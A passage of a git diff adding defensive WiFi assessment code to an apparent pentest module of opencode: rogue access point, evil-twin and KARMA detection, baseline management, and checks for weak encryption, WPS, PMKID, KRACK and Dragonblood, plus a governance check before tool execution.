+   * Detect rogue APs by comparing against a baseline.
+   */
+  export function detectAgainstBaseline(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    baseline: WirelessScanTypes.NetworkBaseline,
+    scanId: string
+  ): WirelessScanTypes.RogueAP[] {
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+
+    for (const network of networks) {
+      // Find baseline entry for this ESSID
+      const baselineEntries = baseline.networks.filter((b) => b.essid === network.essid)
+
+      if (baselineEntries.length === 0) {
+        // New network not in baseline
+        if (network.essid && network.essid !== "<hidden>") {
+          rogueAPs.push(
+            createRogueAP(network, "new_network", 60, undefined, scanId)
+          )
+        }
+        continue
+      }
+
+      // Check if BSSID matches any baseline entry
+      const matchingBaseline = baselineEntries.find((b) => b.bssid === network.bssid)
+
+      if (!matchingBaseline) {
+        // ESSID exists but BSSID is different - potential evil twin
+        rogueAPs.push(
+          createRogueAP(
+            network,
+            "duplicate_essid",
+            85,
+            baselineEntries[0].bssid,
+            scanId
+          )
+        )
+        continue
+      }
+
+      // Check for channel mismatch
+      if (matchingBaseline.channel !== network.channel) {
+        rogueAPs.push(
+          createRogueAP(network, "channel_mismatch", 50, matchingBaseline.bssid, scanId)
+        )
+        continue
+      }
+
+      // Check for encryption downgrade
+      if (
+        isEncryptionDowngrade(matchingBaseline.encryption, network.encryption)
+      ) {
+        rogueAPs.push(
+          createRogueAP(
+            network,
+            "encryption_downgrade",
+            90,
+            matchingBaseline.bssid,
+            scanId
+          )
+        )
+      }
+    }
+
+    return rogueAPs
+  }
+
+  /**
+   * Detect evil twin APs (duplicate ESSIDs with different BSSIDs).
+   */
+  export function detectEvilTwins(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    scanId: string
+  ): WirelessScanTypes.RogueAP[] {
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+    const essidMap = new Map<string, WirelessScanTypes.WiFiNetwork[]>()
+
+    // Group networks by ESSID
+    for (const network of networks) {
+      if (!network.essid || network.essid === "<hidden>") continue
+
+      const existing = essidMap.get(network.essid) || []
+      existing.push(network)
+      essidMap.set(network.essid, existing)
+    }
+
+    // Find ESSIDs with multiple BSSIDs
+    for (const [essid, networkList] of essidMap.entries()) {
+      if (networkList.length <= 1) continue
+
+      // Sort by signal strength (strongest first)
+      networkList.sort((a, b) => b.signal - a.signal)
+
+      // Consider the strongest signal as legitimate (heuristic)
+      const legitimate = networkList[0]
+
+      for (let i = 1; i < networkList.length; i++) {
+        const suspect = networkList[i]
+
+        // Check for suspicious characteristics
+        const confidence = calculateEvilTwinConfidence(legitimate, suspect)
+
+        if (confidence >= 50) {
+          rogueAPs.push(
+            createRogueAP(suspect, "evil_twin", confidence, legitimate.bssid, scanId)
+          )
+        }
+      }
+    }
+
+    return rogueAPs
+  }
+
+  /**
+   * Detect signal anomalies (sudden appearance of strong signals).
+   */
+  export function detectSignalAnomalies(
+    currentNetworks: WirelessScanTypes.WiFiNetwork[],
+    previousNetworks: WirelessScanTypes.WiFiNetwork[],
+    scanId: string
+  ): WirelessScanTypes.RogueAP[] {
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+
+    for (const current of currentNetworks) {
+      const previous = previousNetworks.find((p) => p.bssid === current.bssid)
+
+      if (!previous) {
+        // New network with strong signal
+        if (current.signal > -50) {
+          rogueAPs.push(
+            createRogueAP(current, "signal_anomaly", 70, undefined, scanId)
+          )
+        }
+      } else {
+        // Existing network with sudden signal increase
+        const signalDelta = current.signal - previous.signal
+        if (signalDelta > 20) {
+          rogueAPs.push(
+            createRogueAP(current, "signal_anomaly", 60, previous.bssid, scanId)
+          )
+        }
+      }
+    }
+
+    return rogueAPs
+  }
+
+  /**
+   * Detect MAC address anomalies.
+   */
+  export function detectMACanomalies(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    scanId: string
+  ): WirelessScanTypes.RogueAP[] {
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+
+    for (const network of networks) {
+      // Check for locally administered MAC (bit 1 of first byte set)
+      const firstByte = parseInt(network.bssid.slice(0, 2), 16)
+      if (firstByte & 0x02) {
+        rogueAPs.push(
+          createRogueAP(network, "mac_anomaly", 40, undefined, scanId)
+        )
+        continue
+      }
+
+      // Check for suspicious vendor prefixes (common for Raspberry Pi, etc.)
+      const suspiciousVendors = [
+        "B8:27:EB", // Raspberry Pi
+        "DC:A6:32", // Raspberry Pi
+        "E4:5F:01", // Raspberry Pi
+        "00:0C:29", // VMware
+        "00:50:56", // VMware
+        "08:00:27", // VirtualBox
+      ]
+
+      const macPrefix = network.bssid.slice(0, 8).toUpperCase()
+      if (suspiciousVendors.includes(macPrefix)) {
+        rogueAPs.push(
+          createRogueAP(network, "mac_anomaly", 50, undefined, scanId)
+        )
+      }
+    }
+
+    return rogueAPs
+  }
+
+  /**
+   * Detect KARMA attack (AP responding to all probe requests).
+   */
+  export function detectKARMA(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    clients: WirelessScanTypes.WiFiClient[],
+    scanId: string
+  ): WirelessScanTypes.RogueAP[] {
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+
+    // Collect all probed ESSIDs from clients
+    const probedEssids = new Set<string>()
+    for (const client of clients) {
+      for (const probe of client.probes) {
+        if (probe) probedEssids.add(probe)
+      }
+    }
+
+    // Find networks that match probed ESSIDs but appeared recently
+    const recentThreshold = Date.now() - 5 * 60 * 1000 // 5 minutes
+
+    for (const network of networks) {
+      if (
+        probedEssids.has(network.essid) &&
+        network.firstSeen > recentThreshold
+      ) {
+        // Check if this ESSID appeared after clients started probing
+        rogueAPs.push(
+          createRogueAP(network, "karma_attack", 75, undefined, scanId)
+        )
+      }
+    }
+
+    return rogueAPs
+  }
+
+  // ========== Baseline Management ==========
+
+  /**
+   * Create a baseline from current networks.
+   */
+  export function createBaseline(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    name: string
+  ): WirelessScanTypes.NetworkBaseline {
+    return {
+      id: WirelessScanStorage.createBaselineId(),
+      name,
+      networks: networks.map((n) => ({
+        bssid: n.bssid,
+        essid: n.essid,
+        channel: n.channel,
+        encryption: n.encryption,
+      })),
+      createdAt: Date.now(),
+      updatedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Update baseline with new networks.
+   */
+  export function updateBaseline(
+    baseline: WirelessScanTypes.NetworkBaseline,
+    networks: WirelessScanTypes.WiFiNetwork[],
+    mode: "add" | "replace" | "merge"
+  ): WirelessScanTypes.NetworkBaseline {
+    const newNetworks = networks.map((n) => ({
+      bssid: n.bssid,
+      essid: n.essid,
+      channel: n.channel,
+      encryption: n.encryption,
+    }))
+
+    let updatedNetworks: typeof newNetworks
+
+    switch (mode) {
+      case "replace":
+        updatedNetworks = newNetworks
+        break
+      case "add":
+        // Add only new networks
+        updatedNetworks = [...baseline.networks]
+        for (const network of newNetworks) {
+          if (!updatedNetworks.some((n) => n.bssid === network.bssid)) {
+            updatedNetworks.push(network)
+          }
+        }
+        break
+      case "merge":
+        // Update existing and add new
+        const networkMap = new Map(baseline.networks.map((n) => [n.bssid, n]))
+        for (const network of newNetworks) {
+          networkMap.set(network.bssid, network)
+        }
+        updatedNetworks = Array.from(networkMap.values())
+        break
+    }
+
+    return {
+      ...baseline,
+      networks: updatedNetworks,
+      updatedAt: Date.now(),
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  function createRogueAP(
+    network: WirelessScanTypes.WiFiNetwork,
+    reason: WirelessScanTypes.RogueAP["reason"],
+    confidence: number,
+    legitimateBssid: string | undefined,
+    scanId: string
+  ): WirelessScanTypes.RogueAP {
+    const rogueAP: WirelessScanTypes.RogueAP = {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: network.bssid,
+      essid: network.essid,
+      channel: network.channel,
+      signal: network.signal,
+      reason,
+      legitimateBssid,
+      confidence,
+      detectedAt: Date.now(),
+    }
+
+    Bus.publish(WirelessScanEvents.RogueAPDetected, {
+      scanId,
+      bssid: rogueAP.bssid,
+      essid: rogueAP.essid,
+      reason: rogueAP.reason,
+      confidence: rogueAP.confidence,
+      legitimateBssid: rogueAP.legitimateBssid,
+    })
+
+    return rogueAP
+  }
+
+  function isEncryptionDowngrade(
+    baseline: WirelessScanTypes.WiFiEncryption,
+    current: WirelessScanTypes.WiFiEncryption
+  ): boolean {
+    const encryptionStrength: Record<WirelessScanTypes.WiFiEncryption, number> = {
+      wpa3: 5,
+      "wpa2/wpa3": 4,
+      wpa2: 3,
+      wpa: 2,
+      wep: 1,
+      open: 0,
+      unknown: -1,
+    }
+
+    return (
+      encryptionStrength[current] < encryptionStrength[baseline] &&
+      encryptionStrength[current] >= 0
+    )
+  }
+
+  function calculateEvilTwinConfidence(
+    legitimate: WirelessScanTypes.WiFiNetwork,
+    suspect: WirelessScanTypes.WiFiNetwork
+  ): number {
+    let confidence = 50 // Base confidence for duplicate ESSID
+
+    // Different encryption is suspicious
+    if (suspect.encryption !== legitimate.encryption) {
+      confidence += 20
+    }
+
+    // Lower encryption is more suspicious
+    if (isEncryptionDowngrade(legitimate.encryption, suspect.encryption)) {
+      confidence += 15
+    }
+
+    // Different channel could be legitimate (multi-AP setup) or suspicious
+    if (suspect.channel !== legitimate.channel) {
+      // Same band, different channel - less suspicious
+      if (
+        (suspect.channel <= 14 && legitimate.channel <= 14) ||
+        (suspect.channel > 14 && legitimate.channel > 14)
+      ) {
+        confidence -= 10
+      } else {
+        // Different band - could be dual-band AP
+        confidence -= 20
+      }
+    }
+
+    // Stronger signal from unknown AP is suspicious
+    if (suspect.signal > legitimate.signal + 10) {
+      confidence += 10
+    }
+
+    // Appeared recently
+    const recentThreshold = Date.now() - 10 * 60 * 1000 // 10 minutes
+    if (suspect.firstSeen > recentThreshold) {
+      confidence += 10
+    }
+
+    return Math.min(100, Math.max(0, confidence))
+  }
+
+  // ========== Finding Generation ==========
+
+  /**
+   * Create findings from rogue AP detections.
+   */
+  export function createFindings(
+    rogueAPs: WirelessScanTypes.RogueAP[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    return rogueAPs.map((rogue) => ({
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi" as const,
+      category: "attack" as const,
+      severity: getSeverityForReason(rogue.reason),
+      title: getTitleForReason(rogue.reason),
+      description: getDescriptionForRogue(rogue),
+      target: {
+        type: "network" as const,
+        identifier: rogue.bssid,
+        name: rogue.essid,
+      },
+      vulnerability: rogue.reason.replace(/_/g, " ").replace(/\b\w/g, (c) => c.toUpperCase()),
+      recommendation: getRecommendationForReason(rogue.reason),
+      references: getReferencesForReason(rogue.reason),
+      evidence: `Confidence: ${rogue.confidence}%${rogue.legitimateBssid ? `, Legitimate BSSID: ${rogue.legitimateBssid}` : ""}`,
+      falsePositive: false,
+      verified: false,
+      detectedAt: rogue.detectedAt,
+    }))
+  }
+
+  function getSeverityForReason(
+    reason: WirelessScanTypes.RogueAP["reason"]
+  ): WirelessScanTypes.Severity {
+    const severities: Record<WirelessScanTypes.RogueAP["reason"], WirelessScanTypes.Severity> = {
+      evil_twin: "critical",
+      karma_attack: "critical",
+      encryption_downgrade: "high",
+      duplicate_essid: "high",
+      signal_anomaly: "medium",
+      mac_anomaly: "medium",
+      channel_mismatch: "low",
+      new_network: "info",
+    }
+    return severities[reason]
+  }
+
+  function getTitleForReason(reason: WirelessScanTypes.RogueAP["reason"]): string {
+    const titles: Record<WirelessScanTypes.RogueAP["reason"], string> = {
+      evil_twin: "Evil Twin Access Point Detected",
+      karma_attack: "KARMA Attack Detected",
+      encryption_downgrade: "Encryption Downgrade Attack",
+      duplicate_essid: "Duplicate SSID Detected",
+      signal_anomaly: "Signal Anomaly Detected",
+      mac_anomaly: "Suspicious MAC Address",
+      channel_mismatch: "Channel Mismatch Detected",
+      new_network: "Unknown Network Detected",
+    }
+    return titles[reason]
+  }
+
+  function getDescriptionForRogue(rogue: WirelessScanTypes.RogueAP): string {
+    const descriptions: Record<WirelessScanTypes.RogueAP["reason"], string> = {
+      evil_twin: `An access point with ESSID "${rogue.essid}" (${rogue.bssid}) appears to be an evil twin of the legitimate network. Evil twins impersonate legitimate networks to intercept traffic.`,
+      karma_attack: `An access point with ESSID "${rogue.essid}" (${rogue.bssid}) appears to be responding to client probe requests, indicating a potential KARMA attack.`,
+      encryption_downgrade: `An access point with ESSID "${rogue.essid}" (${rogue.bssid}) is using weaker encryption than the legitimate network, possibly to facilitate man-in-the-middle attacks.`,
+      duplicate_essid: `Multiple access points are broadcasting ESSID "${rogue.essid}". While this could be a legitimate multi-AP deployment, it could also indicate an unauthorized access point.`,
+      signal_anomaly: `An access point with ESSID "${rogue.essid}" (${rogue.bssid}) shows unusual signal characteristics that may indicate a rogue device.`,
+      mac_anomaly: `The MAC address ${rogue.bssid} has characteristics associated with consumer/hobbyist hardware or virtual machines, which is unusual for enterprise access points.`,
+      channel_mismatch: `An access point with ESSID "${rogue.essid}" (${rogue.bssid}) is operating on an unexpected channel, which may indicate a rogue device.`,
+      new_network: `A new network "${rogue.essid}" (${rogue.bssid}) was detected that is not in the baseline. Verify if this is an authorized network.`,
+    }
+    return descriptions[rogue.reason]
+  }
+
+  function getRecommendationForReason(reason: WirelessScanTypes.RogueAP["reason"]): string {
+    const recommendations: Record<WirelessScanTypes.RogueAP["reason"], string> = {
+      evil_twin: "Immediately investigate and locate the rogue access point. Warn users not to connect. Consider using 802.1X authentication and certificate-based validation.",
+      karma_attack: "Alert users to verify network authenticity before connecting. Deploy wireless intrusion prevention systems (WIPS) to automatically contain rogue devices.",
+      encryption_downgrade: "Locate and disable the rogue device. Ensure all legitimate APs use consistent, strong encryption.",
+      duplicate_essid: "Verify all access points with this SSID are authorized. Implement WIDS/WIPS for automated monitoring.",
+      signal_anomaly: "Investigate the source of the anomalous signal. Check for unauthorized devices in the area.",
+      mac_anomaly: "Verify the device is an authorized access point. Implement MAC address whitelisting on the network.",
+      channel_mismatch: "Verify the channel configuration of all authorized access points.",
+      new_network: "Verify if this network is authorized. Add to baseline if legitimate, or investigate if unauthorized.",
+    }
+    return recommendations[reason]
+  }
+
+  function getReferencesForReason(reason: WirelessScanTypes.RogueAP["reason"]): string[] {
+    const baseRefs = ["https://www.wi-fi.org/discover-wi-fi/security"]
+    const specificRefs: Record<WirelessScanTypes.RogueAP["reason"], string[]> = {
+      evil_twin: ["https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)"],
+      karma_attack: ["https://www.yourwifiworker.com/what-is-karma-attack/"],
+      encryption_downgrade: ["https://www.cisco.com/c/en/us/support/docs/wireless/4400-series-wireless-lan-controllers/107606-wlc-rogue-detect.html"],
+      duplicate_essid: [],
+      signal_anomaly: [],
+      mac_anomaly: [],
+      channel_mismatch: [],
+      new_network: [],
+    }
+    return [...baseRefs, ...specificRefs[reason]]
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/security.ts b/packages/opencode/src/pentest/wirelessscan/wifi/security.ts
new file mode 100644
index 00000000000..6231faa8dc5
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/security.ts
@@ -0,0 +1,449 @@
+/**
+ * @fileoverview WiFi Security Assessment
+ *
+ * Security checks and vulnerability assessment for WiFi networks.
+ *
+ * @module pentest/wirelessscan/wifi/security
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * WiFi security namespace.
+ */
+export namespace WiFiSecurity {
+  // ========== Security Check Definitions ==========
+
+  /**
+   * Security check result.
+   */
+  export interface SecurityCheckResult {
+    check: string
+    passed: boolean
+    severity: WirelessScanTypes.Severity
+    title: string
+    description: string
+    recommendation: string
+    references: string[]
+  }
+
+  // ========== Network Security Assessment ==========
+
+  /**
+   * Assess security of a WiFi network.
+   */
+  export function assessNetwork(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    // Check encryption type
+    const encryptionFinding = checkEncryption(network, scanId)
+    if (encryptionFinding) findings.push(encryptionFinding)
+
+    // Check cipher
+    const cipherFinding = checkCipher(network, scanId)
+    if (cipherFinding) findings.push(cipherFinding)
+
+    // Check WPS
+    const wpsFinding = checkWPS(network, scanId)
+    if (wpsFinding) findings.push(wpsFinding)
+
+    // Check for hidden SSID
+    const hiddenFinding = checkHiddenSSID(network, scanId)
+    if (hiddenFinding) findings.push(hiddenFinding)
+
+    // Check for PMKID vulnerability
+    if (network.pmkidVulnerable) {
+      findings.push(createPMKIDFinding(network, scanId))
+    }
+
+    // Emit events for findings
+    for (const finding of findings) {
+      Bus.publish(WirelessScanEvents.FindingDetected, {
+        scanId,
+        findingId: finding.id,
+        wirelessType: "wifi",
+        category: finding.category,
+        severity: finding.severity,
+        title: finding.title,
+        target: finding.target,
+      })
+
+      if (finding.severity === "critical") {
+        Bus.publish(WirelessScanEvents.CriticalFinding, {
+          scanId,
+          findingId: finding.id,
+          title: finding.title,
+          target: finding.target,
+          vulnerability: finding.vulnerability,
+        })
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Check network encryption type.
+   */
+  function checkEncryption(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    const target: WirelessScanTypes.FindingTarget = {
+      type: "network",
+      identifier: network.bssid,
+      name: network.essid,
+    }
+
+    switch (network.encryption) {
+      case "open":
+        return {
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "encryption",
+          severity: "high",
+          title: "Open WiFi Network",
+          description: `Network "${network.essid}" (${network.bssid}) has no encryption enabled. All traffic can be intercepted by anyone within range.`,
+          target,
+          recommendation:
+            "Enable WPA3-Personal or WPA2-Personal encryption with a strong passphrase. For guest networks, consider using WPA3-SAE or OWE (Opportunistic Wireless Encryption).",
+          references: [
+            "https://www.wi-fi.org/discover-wi-fi/security",
+            "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files",
+          ],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        }
+
+      case "wep":
+        return {
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "encryption",
+          severity: "critical",
+          title: "WEP Encryption (Deprecated)",
+          description: `Network "${network.essid}" (${network.bssid}) uses WEP encryption which is completely broken. The key can be recovered in minutes using tools like aircrack-ng.`,
+          target,
+          vulnerability: "WEP Key Recovery",
+          recommendation:
+            "Immediately upgrade to WPA3-Personal or WPA2-Personal. WEP has been deprecated since 2004 and offers no meaningful security.",
+          references: [
+            "https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy#Weak_security",
+            "https://www.aircrack-ng.org/doku.php?id=simple_wep_crack",
+          ],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        }
+
+      case "wpa":
+        return {
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "encryption",
+          severity: "medium",
+          title: "WPA (TKIP) Encryption",
+          description: `Network "${network.essid}" (${network.bssid}) uses WPA with TKIP which has known vulnerabilities. While not as severe as WEP, it should be upgraded.`,
+          target,
+          vulnerability: "TKIP Vulnerabilities",
+          recommendation:
+            "Upgrade to WPA3-Personal or WPA2-Personal with AES/CCMP cipher. Disable TKIP support entirely.",
+          references: [
+            "https://en.wikipedia.org/wiki/Temporal_Key_Integrity_Protocol#Security",
+            "https://papers.mathyvanhoef.com/ccs2017.pdf",
+          ],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        }
+
+      default:
+        return null
+    }
+  }
+
+  /**
+   * Check cipher strength.
+   */
+  function checkCipher(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    if (network.cipher === "tkip" && network.encryption !== "wpa") {
+      return {
+        id: WirelessScanStorage.createFindingId(),
+        scanId,
+        wirelessType: "wifi",
+        category: "encryption",
+        severity: "medium",
+        title: "TKIP Cipher in Use",
+        description: `Network "${network.essid}" (${network.bssid}) is using TKIP cipher which has known vulnerabilities including the Beck-Tews and Ohigashi-Morii attacks.`,
+        target: {
+          type: "network",
+          identifier: network.bssid,
+          name: network.essid,
+        },
+        vulnerability: "TKIP Protocol Weaknesses",
+        recommendation:
+          "Configure the access point to use only AES/CCMP cipher. Disable TKIP entirely as it is deprecated.",
+        references: [
+          "https://en.wikipedia.org/wiki/Temporal_Key_Integrity_Protocol#Security",
+          "https://dl.acm.org/doi/10.1145/1315245.1315285",
+        ],
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      }
+    }
+
+    return null
+  }
+
+  /**
+   * Check WPS status.
+   */
+  function checkWPS(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    if (!network.wps) return null
+
+    const severity: WirelessScanTypes.Severity = network.wpsLocked ? "low" : "medium"
+    const locked = network.wpsLocked ? " (currently locked)" : ""
+
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "configuration",
+      severity,
+      title: `WPS Enabled${locked}`,
+      description: `Network "${network.essid}" (${network.bssid}) has WPS enabled. WPS PIN can be brute-forced using tools like Reaver, potentially exposing the WPA passphrase.`,
+      target: {
+        type: "network",
+        identifier: network.bssid,
+        name: network.essid,
+      },
+      vulnerability: "WPS PIN Brute Force",
+      recommendation:
+        "Disable WPS in the access point configuration. If WPS is required, ensure the AP has rate limiting and automatic lockout after failed attempts.",
+      references: [
+        "https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Vulnerabilities",
+        "https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Check for hidden SSID.
+   */
+  function checkHiddenSSID(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    if (!network.hidden) return null
+
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "configuration",
+      severity: "info",
+      title: "Hidden SSID",
+      description: `Network with BSSID ${network.bssid} has hidden SSID. This provides minimal security benefit and can actually reduce security by causing clients to broadcast the SSID in probe requests.`,
+      target: {
+        type: "network",
+        identifier: network.bssid,
+        name: "<hidden>",
+      },
+      recommendation:
+        "Hidden SSIDs provide no real security benefit. Consider using a visible SSID with strong encryption instead. Clients connecting to hidden networks expose the SSID in their probe requests.",
+      references: ["https://www.howtogeek.com/howto/28653/debunking-myths-is-hiding-your-wireless-ssid-really-more-secure/"],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Create PMKID vulnerability finding.
+   */
+  function createPMKIDFinding(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding {
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "vulnerability",
+      severity: "medium",
+      title: "PMKID Capture Possible",
+      description: `Network "${network.essid}" (${network.bssid}) is vulnerable to PMKID-based attacks. An attacker can capture the PMKID from the first EAPOL frame without waiting for a client to connect, then attempt offline cracking.`,
+      target: {
+        type: "network",
+        identifier: network.bssid,
+        name: network.essid,
+      },
+      vulnerability: "PMKID Attack",
+      recommendation:
+        "Use a strong, complex passphrase (20+ characters with mixed case, numbers, and symbols). Consider upgrading to WPA3-SAE which is not vulnerable to PMKID attacks.",
+      references: [
+        "https://hashcat.net/forum/thread-7717.html",
+        "https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Known Vulnerability Checks ==========
+
+  /**
+   * Check for KRACK vulnerability (Key Reinstallation Attack).
+   */
+  export function checkKRACK(network: WirelessScanTypes.WiFiNetwork, scanId: string): WirelessScanTypes.WirelessFinding | null {
+    // KRACK affects WPA2 networks
+    if (network.encryption !== "wpa2" && network.encryption !== "wpa2/wpa3") {
+      return null
+    }
+
+    // Note: Actual KRACK detection requires active testing
+    // This is informational only
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "vulnerability",
+      severity: "info",
+      title: "Potential KRACK Vulnerability",
+      description: `Network "${network.essid}" (${network.bssid}) uses WPA2 which may be vulnerable to KRACK (Key Reinstallation Attack). Verify that all devices have been patched.`,
+      target: {
+        type: "network",
+        identifier: network.bssid,
+        name: network.essid,
+      },
+      vulnerability: "KRACK",
+      cve: "CVE-2017-13077",
+      recommendation:
+        "Ensure all access points and client devices have firmware/software updates from October 2017 or later. Consider upgrading to WPA3 which includes protections against KRACK.",
+      references: [
+        "https://www.krackattacks.com/",
+        "https://papers.mathyvanhoef.com/ccs2017.pdf",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Check for Dragonblood vulnerabilities (WPA3).
+   */
+  export function checkDragonblood(
+    network: WirelessScanTypes.WiFiNetwork,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding | null {
+    // Dragonblood affects WPA3 networks
+    if (network.encryption !== "wpa3" && network.encryption !== "wpa2/wpa3") {
+      return null
+    }
+
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "vulnerability",
+      severity: "info",
+      title: "Potential Dragonblood Vulnerability",
+      description: `Network "${network.essid}" (${network.bssid}) uses WPA3 which may be vulnerable to Dragonblood attacks if not patched. This includes timing-based side-channel attacks and downgrade attacks.`,
+      target: {
+        type: "network",
+        identifier: network.bssid,
+        name: network.essid,
+      },
+      vulnerability: "Dragonblood",
+      cve: "CVE-2019-9494",
+      recommendation:
+        "Ensure the access point has the latest firmware updates. Consider disabling WPA2 fallback mode to prevent downgrade attacks.",
+      references: [
+        "https://wpa3.mathyvanhoef.com/",
+        "https://papers.mathyvanhoef.com/dragonblood.pdf",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Batch Assessment ==========
+
+  /**
+   * Assess security of all networks.
+   */
+  export function assessAllNetworks(
+    networks: WirelessScanTypes.WiFiNetwork[],
+    scanId: string,
+    options: {
+      checkKRACK?: boolean
+      checkDragonblood?: boolean
+    } = {}
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const network of networks) {
+      findings.push(...assessNetwork(network, scanId))
+
+      if (options.checkKRACK) {
+        const krackFinding = checkKRACK(network, scanId)
+        if (krackFinding) findings.push(krackFinding)
+      }
+
+      if (options.checkDragonblood) {
+        const dragonbloodFinding = checkDragonblood(network, scanId)
+        if (dragonbloodFinding) findings.push(dragonbloodFinding)
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Get security summary for networks.
+   */
+  export function getSecuritySummary(networks: WirelessScanTypes.WiFiNetwork[]): {
+    total: number
+    open: number
+    wep: number
+    wpa: number
+    wpa2: number
+    wpa3: number
+    wpsEnabled: number
+    hidden: number
+  } {
+    return {
+      total: networks.length,
+      open: networks.filter((n) => n.encryption === "open").length,
+      wep: networks.filter((n) => n.encryption === "wep").length,
+      wpa: networks.filter((n) => n.encryption === "wpa").length,
+      wpa2: networks.filter((n) => n.encryption === "wpa2").length,
+      wpa3: networks.filter((n) => n.encryption === "wpa3" || n.encryption === "wpa2/wpa3").length,
+      wpsEnabled: networks.filter((n) => n.wps).length,
+      hidden: networks.filter((n) => n.hidden).length,
+    }
+  }
+}
diff --git a/packages/opencode/src/plugin/index.ts b/packages/opencode/src/plugin/index.ts
index 84de520b81d..602da168349 100644
--- a/packages/opencode/src/plugin/index.ts
+++ b/packages/opencode/src/plugin/index.ts
@@ -11,6 +11,7 @@ import { CodexAuthPlugin } from "./codex"
 import { Session } from "../session"
 import { NamedError } from "@opencode-ai/util/error"
 import { CopilotAuthPlugin } from "./copilot"
+import { Governance } from "../governance"
 
 export namespace Plugin {
   const log = Log.create({ service: "plugin" })
@@ -101,6 +102,34 @@ export namespace Plugin {
     Output = Parameters<Required<Hooks>[Name]>[1],
   >(name: Name, input: Input, output: Output): Promise<Output> {
     if (!name) return output
+
+    // Governance check before tool execution
+    if (name === "tool.execute.before") {
+      const config = await Config.get()
+      if (Governance.isEnabled(config.governance)) {
+        const toolInput = input as { tool: string; args: Record<string, any>; sessionID: string; callID: string }
+        const result = await Governance.check(
+          {
+            tool: toolInput.tool,
+            args: toolInput.args,
+            sessionID: toolInput.sessionID || "unknown",
+            callID: toolInput.callID || "unknown",
+          },
+          config.governance
+        )
+
+        if (!result.allowed) {
+          throw new Governance.DeniedError(result)
+        }
+
+        log.info("Governance check passed", {
+          tool: toolInput.tool,
+          outcome: result.outcome,
+          policy: result.matchedPolicy,
+        })
+      }
+    }
+
     for (const hook of await state().then((x) => x.hooks)) {
       const fn = hook[name]
       if (!fn) continue
diff --git a/packages/opencode/src/server/dashboard.ts b/packages/opencode/src/server/dashboard.ts
new file mode 100644
index 00000000000..647b25f0804
--- /dev/null
+++ b/packages/opencode/src/server/dashboard.ts
@@ -0,0 +1,690 @@
+/**
+ * @fileoverview Dashboard API Routes
+ *
+ * Hono routes for the pentest reporting dashboard.
+ * Provides endpoints for findings, scans, monitors, statistics, and compliance.
+ *
+ * @module server/dashboard
+ */
+
+import { Hono } from "hono"
+import z from "zod"
